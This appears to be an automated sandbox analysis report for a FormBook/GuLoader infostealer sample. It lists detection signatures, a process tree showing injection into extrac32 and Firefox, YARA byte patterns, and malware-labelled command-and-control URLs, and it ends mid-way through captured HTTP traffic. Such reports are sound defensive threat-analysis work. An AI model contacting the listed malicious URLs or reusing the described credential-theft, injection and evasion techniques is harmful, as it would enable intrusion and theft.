Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
U6SJBLxT2Z.exe

Overview

General Information

Sample Name:U6SJBLxT2Z.exe
Analysis ID:1344305
MD5:01e7d9fdc578b010ac4742a69874b8c9
SHA1:d2ebff34b92a345f5a5e19a87dbb96a96608f717
SHA256:bc27cfc934a295e4c380cf5a2e9b5cdb902339e4b2ca2e282c0fadc32e120feb
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • U6SJBLxT2Z.exe (PID: 7232 cmdline: C:\Users\user\Desktop\U6SJBLxT2Z.exe MD5: 01E7D9FDC578B010AC4742A69874B8C9)
    • U6SJBLxT2Z.exe (PID: 5688 cmdline: C:\Users\user\Desktop\U6SJBLxT2Z.exe MD5: 01E7D9FDC578B010AC4742A69874B8C9)
      • RvEFtjZJSPYTXuqJXJdvrvwe.exe (PID: 5828 cmdline: "C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • extrac32.exe (PID: 2212 cmdline: C:\Windows\SysWOW64\extrac32.exe MD5: 9472AAB6390E4F1431BAA912FCFF9707)
          • RvEFtjZJSPYTXuqJXJdvrvwe.exe (PID: 4140 cmdline: "C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3636 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.12033634200.0000000032530000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.12033634200.0000000032530000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x277b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1397f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x277b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1397f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000000.00000002.11924794479.0000000000528000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
        Click to see the 12 entries
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: U6SJBLxT2Z.exeReversingLabs: Detection: 25%
        Source: Yara matchFile source: 00000002.00000002.12033634200.0000000032530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.16761189587.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.16760933797.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.16761377497.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.16761692315.0000000003480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.12034799323.00000000335B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: http://www.frhighdaypharms.com/fbkg/Avira URL Cloud: Label: malware
        Source: http://www.littlehappiez.com/fbkg/?T6I=gThqwOvIwGDnMNcvwEy/c56UiQuqoTrywE2cwCjfVSyuasLCA8NVIajs9Zxk63n6o6uPmxzzITamFvPAcrLEMG/rHqTHzN/vWA==&Nx1L1=526dgl_phJAvira URL Cloud: Label: malware
        Source: http://www.lets-room.online/fbkg/Avira URL Cloud: Label: malware
        Source: https://littlehappiez.com/fbkg?T6I=gThqwOvIwGDnMNcvwEy/c56UiQuqoTrywE2cwCjfVSyuasLCA8NVIajs9Zxk63n6oAvira URL Cloud: Label: malware
        Source: http://www.littlehappiez.com/fbkg/Avira URL Cloud: Label: malware
        Source: http://www.frhighdaypharms.com/fbkg/?Nx1L1=526dgl_phJ&T6I=kaJyhKmkPlgtKJtmmBfH2viQGZqK+66G0n0GrQsx6FyEW0DjSTzd6+/fE4wxwFlAMzIoBYsI873pRJak10YM5J9PGBdAXgKtow==Avira URL Cloud: Label: malware
        Source: U6SJBLxT2Z.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.250.176.206:443 -> 192.168.11.20:50127 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.81.225:443 -> 192.168.11.20:50128 version: TLS 1.2
        Source: U6SJBLxT2Z.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: U6SJBLxT2Z.exe, 00000002.00000001.11817930124.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000004.00000002.16758521202.000000000009E000.00000002.00000001.01000000.00000009.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16758517604.000000000009E000.00000002.00000001.01000000.00000009.sdmp
        Source: Binary string: wntdll.pdbUGP source: U6SJBLxT2Z.exe, 00000002.00000003.11934530000.00000000324FF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11939159461.00000000326AC000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16762252801.00000000051DD000.00000040.00001000.00020000.00000000.sdmp, extrac32.exe, 00000005.00000003.12020224925.0000000004F04000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000003.12016926464.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16762252801.00000000050B0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: U6SJBLxT2Z.exe, U6SJBLxT2Z.exe, 00000002.00000003.11934530000.00000000324FF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11939159461.00000000326AC000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, extrac32.exe, extrac32.exe, 00000005.00000002.16762252801.00000000051DD000.00000040.00001000.00020000.00000000.sdmp, extrac32.exe, 00000005.00000003.12020224925.0000000004F04000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000003.12016926464.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16762252801.00000000050B0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: extrac32.pdb source: U6SJBLxT2Z.exe, 00000002.00000003.11985854504.00000000026FB000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11985690204.0000000002704000.00000004.00000020.00020000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000004.00000003.15637676289.0000000000CAB000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: U6SJBLxT2Z.exe, 00000002.00000001.11817930124.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: firefox.pdb source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000003.12261420021.0000000008422000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: extrac32.pdbGCTL source: U6SJBLxT2Z.exe, 00000002.00000003.11985854504.00000000026FB000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11985690204.0000000002704000.00000004.00000020.00020000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000004.00000003.15637676289.0000000000CAB000.00000004.00000001.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_0040676F FindFirstFileW,FindClose,0_2_0040676F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_00405B23 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B23
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030CBDE0 FindFirstFileW,FindNextFileW,FindClose,5_2_030CBDE0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 4x nop then pop edi5_2_030C15D0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 4x nop then xor eax, eax5_2_030B98E0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 4x nop then pop edi5_2_030C15AA
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 4x nop then pop edi5_2_030BDE88
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
        Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Nov 2023 18:25:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=66BMUASONtsNX4ex8wowfBWUZj99EdJQtll2k48W1iemWCVKgawFSCKu6yz8cpevrLLHHz%2FO8dm1Fq%2BkQPEJe5pAhTYqdadBjBPWnzgKFbiVc2Cc26SkrHx5sXS%2BKc3SZA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 827a04ec59c243c2-EWRalt-svc: h3=":443"; ma=86400Data Raw: 34 37 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f Data Ascii: 475<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404 - </title><style type="text/css">
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Nov 2023 18:26:49 GMTServer: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3X-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=31536000; includeSubDomainsContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Nov 2023 18:26:52 GMTServer: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3X-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=31536000; includeSubDomainsContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Nov 2023 18:26:55 GMTServer: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3X-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=31536000; includeSubDomainsContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Nov 2023 18:26:57 GMTServer: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3X-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=31536000; includeSubDomainsContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Fri, 17 Nov 2023 18:27:49 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Fri, 17 Nov 2023 18:27:52 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 